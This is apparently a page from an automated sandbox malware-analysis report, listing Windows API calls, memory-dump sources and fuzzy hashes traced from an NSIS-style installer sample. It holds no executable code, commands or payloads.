                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                              • String ID: Call$N
                                                                                                              • API String ID: 3103080414-3438112850
                                                                                                              • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                              • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: F
                                                                                                              • API String ID: 941294808-1304234792
                                                                                                              • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                              • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                              APIs
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                              • wsprintfA.USER32 ref: 004060B3
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\xXUnP7uCBJ.exe,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                              • API String ID: 2171350718-461813615
                                                                                                              • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                              • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                              • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                              • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                              • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                              • GetSysColor.USER32(?), ref: 0040444C
                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                              • DeleteObject.GDI32(?), ref: 00404476
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 2531174081-0
                                                                                                              • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                              • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                              • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                              • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 589700163-2246974252
                                                                                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                              • wsprintfW.USER32 ref: 00402EF5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,00001759), ref: 00402E87
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                              • String ID: ... %d%%
                                                                                                              • API String ID: 722711167-2449383134
                                                                                                              • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                              • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                              • GetMessagePos.USER32 ref: 00404D3D
                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                              • wsprintfW.USER32 ref: 00402E45
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                              • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                              • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                              APIs
                                                                                                                • Part of subcall function 701A121B: GlobalAlloc.KERNEL32(00000040,?,701A123B,?,701A12DF,00000019,701A11BE,-000000A0), ref: 701A1225
                                                                                                              • GlobalFree.KERNEL32(?), ref: 701A2657
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701A268C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2259069122.00000000701A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701A0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2259033794.00000000701A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259096559.00000000701A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2259132821.00000000701A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701a0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1780285237-0
                                                                                                              • Opcode ID: 561fd7fb8e2610592c0fecaeb61ebf2c8ecd88634759a17efa42e7f3bc9f1569
                                                                                                              • Instruction ID: 0aa48b1a1f0a2fd58eb4bfb0a29bcec9f890a56cad605f3f6336d977372ef69c
                                                                                                              • Opcode Fuzzy Hash: 561fd7fb8e2610592c0fecaeb61ebf2c8ecd88634759a17efa42e7f3bc9f1569
                                                                                                              • Instruction Fuzzy Hash: 6B31F2FA605101DFC7168F59CE94D6E7BBAFB8630033141ADFA46E3A60C770A815EB61
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2667972263-0
                                                                                                              • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                              • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                              • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                              • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • wsprintfW.USER32 ref: 00404CB6
                                                                                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s$(7B
                                                                                                              • API String ID: 3540041739-1320723960
                                                                                                              • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                              • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                              • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                              • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                              APIs
                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nswC272.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nswC272.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nswC272.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nswC272.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nswC272.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
